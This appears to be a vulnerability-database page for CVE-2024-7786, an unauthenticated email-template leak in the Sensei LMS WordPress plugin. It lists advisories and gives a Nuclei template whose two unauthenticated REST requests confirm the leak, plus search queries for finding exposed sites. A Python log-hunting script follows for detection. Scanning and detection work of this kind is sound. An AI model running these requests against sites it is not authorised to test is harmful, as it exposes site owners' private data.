| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-7786 | 4 Sep 2024 09:22 | – | circl |
| WordPress plugin Sensei LMS security vulnerability | 4 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-7786 | 4 Sep 2024 06:00 | – | cve |
| CVE-2024-7786 Sensei LMS < 4.24.2 - Unauthenticated Email Template Leak | 4 Sep 2024 06:00 | – | cvelist |
| CVE-2024-7786 | 4 Sep 2024 06:15 | – | nvd |
| WordPress Sensei LMS Plugin < 4.24.2 is vulnerable to Broken Access Control | 4 Sep 2024 00:00 | – | patchstack |
| WordPress Sensei LMS plugin < 4.24.2 - Unauthenticated Email Template Leak vulnerability | 4 Sep 2024 09:35 | – | patchstack |
| PT-2024-38580 · WordPress · Sensei Lms | 3 Sep 2024 00:00 | – | ptsecurity |
| CVE-2024-7786 | 23 May 2025 09:49 | – | redhatcve |
| VulnCheck KEV: CVE-2024-7786 | 4 Sep 2024 00:00 | – | vulncheck_kev |
```yaml
id: CVE-2024-7786

info:
  name: Sensei LMS < 4.24.2 - Email Template Leak
  author: s4e-io
  severity: high
  description: |
    The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some of its REST API routes, allowing unauthenticated attackers to leak email templates.
  impact: |
    Unauthenticated attackers can access and leak email templates through unprotected REST API endpoints, potentially exposing sensitive information included in email communications and template configurations.
  remediation: |
    Update Sensei LMS plugin to version 4.24.2 or later to address the REST API protection issue.
  reference:
    - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7786
    - https://www.usom.gov.tr/bildirim/tr-24-1387
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-7786
    epss-score: 0.01635
    epss-percentile: 0.73332
  metadata:
    max-request: 2
    verified: true
    vendor: automattic
    product: sensei-lms
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sensei-lms"
    fofa-query: body="/wp-content/plugins/sensei-lms"
  tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev,vuln

flow: http(1) && http(2)

http:
  # Request 1: list the sensei_email collection and pull the first template id.
  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"id","date_gmt","slug")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.[0].id'
        internal: true

  # Request 2: fetch that single template; a 200 JSON body confirms the leak.
  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sensei_email_preview_id={{template_id}}'
          - 'media?parent={{template_id}}'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d2e8eadd84c543044a13d17056f84d7939da106e1dbba3588201d0fe508e091302200d2a256504baee74c05d54fd6614b38216943e736cd83715c3206f8c214385ea:922c64590222798bb761d5b6d8e72950
```
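The template's two-request flow (list the `sensei_email` collection, then fetch one item by id) is also a useful pattern to hunt for in web-server access logs on a site that has not yet been updated. The following is an added example, not part of the Nuclei template or of the Vulners record; it assumes Apache/Nginx combined log format, and the log lines, client addresses and template ids in it are constructed.

```python
import re

# Combined log format (Apache/Nginx); remote user and timestamp are captured but unused.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The two routes the template probes, with or without the /index.php prefix.
LIST_RE = re.compile(r'^(?:/index\.php)?/wp-json/wp/v2/sensei_email/?(?:\?.*)?$')
ITEM_RE = re.compile(r'^(?:/index\.php)?/wp-json/wp/v2/sensei_email/(?P<id>\d+)/?(?:\?.*)?$')


def find_template_leaks(lines):
    """Return {client_ip: {"listed": bool, "ids": [...]}} for each client that
    received HTTP 200 from a sensei_email REST route.  "listed" is True when
    the client also enumerated the collection (the template's first request);
    "ids" holds the template ids it fetched (the template's second request).
    Only 200 responses count: a request the site rejected served no template.
    Access logs do not show WordPress cookie auth, so hits from legitimate
    editors still have to be filtered out by source address or session."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        ip, path = m["ip"], m["path"]
        if LIST_RE.match(path):
            seen.setdefault(ip, {"listed": False, "ids": []})["listed"] = True
        elif item := ITEM_RE.match(path):
            seen.setdefault(ip, {"listed": False, "ids": []})["ids"].append(int(item["id"]))
    return seen


# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2024:09:22:01 +0000] "GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Sep/2024:09:22:02 +0000] "GET /index.php/wp-json/wp/v2/sensei_email/42 HTTP/1.1" 200 2048',
    '192.0.2.5 - - [04/Sep/2024:09:40:15 +0000] "GET /wp-json/wp/v2/sensei_email/7 HTTP/1.1" 200 1980',
    '198.51.100.9 - - [04/Sep/2024:10:01:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000',
    '198.51.100.9 - - [04/Sep/2024:10:01:01 +0000] "GET /wp-json/wp/v2/sensei_email/ HTTP/1.1" 401 120',
]

if __name__ == "__main__":
    for ip, hit in find_template_leaks(SAMPLE_LOG).items():
        step = "listed and fetched" if hit["listed"] else "fetched"
        print(f"{ip} {step} Sensei email template(s) {hit['ids']} without a rejected response; review")
```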